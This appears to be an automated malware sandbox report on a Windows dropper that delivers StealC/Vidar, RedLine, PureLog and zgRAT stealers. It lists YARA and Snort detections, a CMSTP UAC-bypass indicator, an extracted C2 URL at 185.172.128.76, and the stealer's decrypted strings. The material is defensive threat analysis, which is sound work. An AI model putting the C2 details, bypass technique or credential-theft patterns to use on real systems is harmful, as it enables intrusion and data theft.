31.2.cmd.exe.5521264.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
31.2.cmd.exe.5521264.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dd08:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd93:$s1: CoGetObject 0x1dcec:$s2: Elevation:Administrator!new:
30.2.UniversalInstaller.exe.3e30d5b.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
30.2.UniversalInstaller.exe.3e30d5b.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d108:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d193:$s1: CoGetObject 0x1d0ec:$s2: Elevation:Administrator!new:
10.2.u48o.0.exe.5c90e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.u48o.0.exe.5c90e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
20.2.UniversalInstaller.exe.3736d5b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.UniversalInstaller.exe.3736d5b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1d108:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1d193:$s1: CoGetObject 0x1d0ec:$s2: Elevation:Administrator!new:
22.2.cmd.exe.5ba00c8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
22.2.cmd.exe.5ba00c8.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
22.2.cmd.exe.5ba00c8.7.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb643a:$s14: keybd_event 0xbd16f:$v1_1: grabber@ 0xb7003:$v1_2: <BrowserProfile>k__ 0xb7a7c:$v1_3: <SystemHardwares>k__ 0xb7b3b:$v1_5: <ScannedWallets>k__ 0xb7bcb:$v1_6: <DicrFiles>k__ 0xb7ba7:$v1_7: <MessageClientFiles>k__ 0xb7f71:$v1_8: <ScanBrowsers>k__BackingField 0xb7fc3:$v1_8: <ScanWallets>k__BackingField 0xb7fe0:$v1_8: <ScanScreen>k__BackingField 0xb801a:$v1_8: <ScanVPN>k__BackingField 0xa98aa:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa91b6:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
30.2.UniversalInstaller.exe.3dec86d.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
30.2.UniversalInstaller.exe.3dec86d.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615f6:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61681:$s1: CoGetObject 0x615da:$s2: Elevation:Administrator!new:
27.2.MSBuild.exe.610000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
26.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256726b0000.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.3.u48o.0.exe.5cc0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.3.u48o.0.exe.5cc0000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
18.2.UniversalInstaller.exe.43a586d.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
18.2.UniversalInstaller.exe.43a586d.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615f6:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61681:$s1: CoGetObject 0x615da:$s2: Elevation:Administrator!new:
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545947a3.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x20e3df:$s1: file:/// 0x20e2eb:$s2: {11111-22222-10009-11112} 0x20e36f:$s3: {11111-22222-50001-00000} 0x20c5ea:$s4: get_Module 0x47377:$s5: Reverse 0x20c917:$s5: Reverse 0x4bfbe:$s6: BlockCopy 0x2097f4:$s6: BlockCopy 0x478bc:$s7: ReadByte 0x20e3f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578e432f.3.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x33fd85:$s1: file:/// 0x33fc95:$s2: {11111-22222-10009-11112} 0x33fd15:$s3: {11111-22222-50001-00000} 0x1b26e8:$s4: get_Module 0x2b78fa:$s4: get_Module 0x33df48:$s4: get_Module 0x1b3b3b:$s5: Reverse 0x1f3faf:$s5: Reverse 0x33e22e:$s5: Reverse 0x2c3c13:$s6: BlockCopy 0x35c69c:$s6: BlockCopy 0x2b9dde:$s7: ReadByte 0x33fd97:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256545a4dad.5.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1fddd5:$s1: file:/// 0x1fdce1:$s2: {11111-22222-10009-11112} 0x1fdd65:$s3: {11111-22222-50001-00000} 0x1fbfe0:$s4: get_Module 0x36d6d:$s5: Reverse 0x1fc30d:$s5: Reverse 0x3b9b4:$s6: BlockCopy 0x1f91ea:$s6: BlockCopy 0x372b2:$s7: ReadByte 0x1fdde7:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.25657908739.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x31b97b:$s1: file:/// 0x31b88b:$s2: {11111-22222-10009-11112} 0x31b90b:$s3: {11111-22222-50001-00000} 0x18e2de:$s4: get_Module 0x2934f0:$s4: get_Module 0x319b3e:$s4: get_Module 0x18f731:$s5: Reverse 0x1cfba5:$s5: Reverse 0x319e24:$s5: Reverse 0x29f809:$s6: BlockCopy 0x338292:$s6: BlockCopy 0x2959d4:$s7: ReadByte 0x31b98d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.256578bd525.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x366b8f:$s1: file:/// 0x366a9f:$s2: {11111-22222-10009-11112} 0x366b1f:$s3: {11111-22222-50001-00000} 0x1d94f2:$s4: get_Module 0x2de704:$s4: get_Module 0x364d52:$s4: get_Module 0x1da945:$s5: Reverse 0x21adb9:$s5: Reverse 0x365038:$s5: Reverse 0x2eaa1d:$s6: BlockCopy 0x3834a6:$s6: BlockCopy 0x2e0be8:$s7: ReadByte 0x366ba1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
14.0.u48o.1.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2565458537d.8.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x21d805:$s1: file:/// 0x21d711:$s2: {11111-22222-10009-11112} 0x21d795:$s3: {11111-22222-50001-00000} 0x21ba10:$s4: get_Module 0x5679d:$s5: Reverse 0x21bd3d:$s5: Reverse 0x5b3e4:$s6: BlockCopy 0x218c1a:$s6: BlockCopy 0x56ce2:$s7: ReadByte 0x21d817:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 77 entries

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\u48o.0.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\u48o.0.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\u48o.0.exe, ParentCommandLine: "C:\Users\user\Desktop\zLwT7vCojz.exe", ParentImage: C:\Users\user\Desktop\zLwT7vCojz.exe, ParentProcessId: 5496, ParentProcessName: zLwT7vCojz.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe" , ProcessId: 3912, ProcessName: u48o.0.exe

Snort Signatures

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.7

Timestamp:	04/23/24-09:43:14.069288
SID:	2051828
Source Port:	80
Destination Port:	49703
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) - Source IP: 192.168.2.7 - Destination IP: 185.172.128.90

Timestamp:	04/23/24-09:43:08.941626
SID:	2856233
Source Port:	49699
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.7

Timestamp:	04/23/24-09:43:14.396563
SID:	2051831
Source Port:	80
Destination Port:	49703
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.7 - Destination IP: 185.172.128.76

Timestamp:	04/23/24-09:43:13.760484
SID:	2044244
Source Port:	49703
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.7 - Destination IP: 185.172.128.76

Timestamp:	04/23/24-09:43:13.365491
SID:	2044243
Source Port:	49703
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.7 - Destination IP: 185.172.128.76

Timestamp:	04/23/24-09:43:14.083688
SID:	2044246
Source Port:	49703
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: zLwT7vCojz.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\pfswlxy

Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
Source: u48o.0.exe.3912.10.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll	Virustotal: Detection: 12%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\pfswlxy	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\pfswlxy	Virustotal: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\wyftaheq	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\wyftaheq	Virustotal: Detection: 60%	Perma Link

Multi AV Scanner detection for submitted file

Source: zLwT7vCojz.exe	ReversingLabs: Detection: 39%
Source: zLwT7vCojz.exe	Virustotal: Detection: 40%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\pfswlxy

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: zLwT7vCojz.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetProcAddress
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: LoadLibraryA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: lstrcatA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: OpenEventA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CreateEventA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CloseHandle
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Sleep
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: VirtualFree
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetSystemInfo
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: VirtualAlloc
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: HeapAlloc
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetComputerNameA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: lstrcpyA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetProcessHeap
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetCurrentProcess
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: lstrlenA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: ExitProcess
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetSystemTime
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: advapi32.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: gdi32.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: user32.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: crypt32.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: ntdll.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetUserNameA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CreateDCA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetDeviceCaps
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: ReleaseDC
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: sscanf
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: VMwareVMware
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: HAL9TH
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: JohnDoe
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: DISPLAY
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: http://185.172.128.76
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: /3cd2b41cbde8fc9c.php
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: /15f649199f40275b/
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: default10
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetFileAttributesA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GlobalLock
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: HeapFree
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetFileSize
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GlobalSize
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: IsWow64Process
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Process32Next
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetLocalTime
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: FreeLibrary
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetVolumeInformationA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: Process32First
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetModuleFileNameA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: DeleteFileA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: FindNextFileA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: LocalFree
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: FindClose
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: LocalAlloc
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetFileSizeEx
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: ReadFile
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SetFilePointer
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: WriteFile
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CreateFileA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: FindFirstFileA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CopyFileA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: VirtualProtect
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetLastError
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: lstrcpynA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: MultiByteToWideChar
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GlobalFree
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: WideCharToMultiByte
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GlobalAlloc
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: OpenProcess
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: TerminateProcess
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetCurrentProcessId
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: gdiplus.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: ole32.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: bcrypt.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: wininet.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: shell32.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: psapi.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: rstrtmgr.dll
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SelectObject
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: BitBlt
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: DeleteObject
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CreateCompatibleDC
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GdiplusStartup
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GdiplusShutdown
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GdipDisposeImage
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GdipFree
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CoUninitialize
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CoInitialize
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CoCreateInstance
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: BCryptDecrypt
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: BCryptSetProperty
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: BCryptDestroyKey
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetWindowRect
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetDesktopWindow
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetDC
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CloseWindow
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: wsprintfA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CharToOemW
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: wsprintfW
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: RegQueryValueExA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: RegEnumKeyExA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: RegOpenKeyExA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: RegCloseKey
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: RegEnumValueA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: CryptUnprotectData
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: SHGetFolderPathA
Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpack	String decryptor: ShellExecuteExA
